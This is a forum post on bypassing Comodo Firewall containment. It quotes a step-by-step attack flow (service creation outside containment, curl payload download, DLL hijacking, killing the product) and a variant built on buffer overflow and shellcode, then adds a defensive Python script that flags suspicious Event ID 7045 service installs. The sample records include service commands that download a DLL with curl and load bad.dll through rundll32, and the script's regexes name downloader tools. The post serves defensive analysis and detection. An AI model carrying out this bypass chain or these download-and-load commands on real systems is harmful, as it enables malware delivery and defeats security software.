Comodo Firewall Bypassing a Bypass
Quoting Andy Ful (post 1106507):

Here is the original attack flow:
Run POC -> POC can create services outside containment through magic -> Use service (to run curl.exe) to download the payloads -> Use service to run a file trusted by Comodo and do DLL hijacking (the bad DLL released escaped.txt) -> Run tdsskiller -> Comodo dead

As we can see, Comodo did not detect or contain DLL hijacking with a bad DLL. It is also common for other AVs, so the popularity of DLL hijacking is growing.

The modified attack flow:
Exploit (system or benign application) -----> Buffer overflow -----> run shellcode -----> create service ----> use service to download the payloads ----> DLL hijacking (ransomware, info stealer, etc.)

In the modified attack, the malicious code is in the DLL (no other file is used, to avoid detection/containment).
Such an attack can bypass Comodo without triggering containment, especially when HIPS is disabled or in Safe Mode. The attack is much easier with LUA disabled, because the shellcode runs with high privileges. Without this tweak, the exploit also needs another exploit (privilege escalation) to create the service. Exploits without privilege escalation are common. Exploits with privilege escalation are rare and quickly patched.

You are an active member on the Comodo forum, so it would be interesting to ask the Comodo staff why they do not disable LUA to improve the containment in Limited, Restricted, and Untrusted settings.
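The pivot in both flows above is the service that gets created outside containment and then used to download payloads or load a DLL. From a defender's side, that step leaves a Windows System-log Event ID 7045 ("A service was installed in the system") record. The following is an added example, not code from the post or from Comodo: a small triage routine over constructed 7045 records (flattened to key=value form, a format assumed here for illustration) that flags service installs whose command line downloads from a URL, loads a DLL through a system host binary, or points into a user-writable directory.

```python
import re

# Constructed sample of Event ID 7045 records, flattened to key=value form as a
# log forwarder might export them. Names, paths and the URL are made up.
SAMPLE_7045 = [
    'EventID=7045 ServiceName=WinDefend ImagePath="C:\\Program Files\\Windows Defender\\MsMpEng.exe" StartType=auto Account=LocalSystem',
    'EventID=7045 ServiceName=svchelper ImagePath="C:\\Windows\\System32\\curl.exe -o C:\\Users\\Public\\upd.dll https://example.invalid/upd.dll" StartType=demand Account=LocalSystem',
    'EventID=7045 ServiceName=Updater ImagePath="C:\\Users\\Public\\updater.exe" StartType=auto Account=LocalSystem',
    'EventID=7045 ServiceName=LoadHelper ImagePath="C:\\Windows\\System32\\rundll32.exe C:\\ProgramData\\bad.dll,Start" StartType=demand Account=LocalSystem',
]

# Rules tied to the attack flow in the post: a service used as a downloader,
# a service used to load a DLL, and a service binary living where any user can write.
USER_WRITABLE = re.compile(r"\\(Users|ProgramData|Temp)\\", re.I)
DOWNLOADER = re.compile(r"\b(curl|certutil|bitsadmin)\.exe\b.*https?://", re.I)
DLL_LOADER = re.compile(r"\b(rundll32|regsvr32)\.exe\b.*\.dll", re.I)


def parse_7045(line):
    """Split a flattened 7045 record into a dict; quoted values keep their inner spaces."""
    fields = {}
    for key, val in re.findall(r'(\w+)=("[^"]*"|\S+)', line):
        fields[key] = val.strip('"')
    return fields


def classify(line):
    """Return the reasons a service install looks like a containment escape ([] if clean)."""
    rec = parse_7045(line)
    if rec.get("EventID") != "7045":
        return []
    path = rec.get("ImagePath", "")
    reasons = []
    if DOWNLOADER.search(path):
        reasons.append("service command downloads from a URL")
    if DLL_LOADER.search(path):
        reasons.append("service loads a DLL via a system host binary")
    if USER_WRITABLE.search(path):
        reasons.append("service references a user-writable path")
    return reasons


def suspicious_services(lines):
    """Map service name -> reasons for every record that triggers at least one rule."""
    out = {}
    for line in lines:
        reasons = classify(line)
        if reasons:
            out[parse_7045(line)["ServiceName"]] = reasons
    return out


if __name__ == "__main__":
    for name, why in suspicious_services(SAMPLE_7045).items():
        print(name, "->", "; ".join(why))
```

A service created by an unprivileged process should not exist at all, so any hit here is worth correlating with the parent process and with the LUA setting the post discusses.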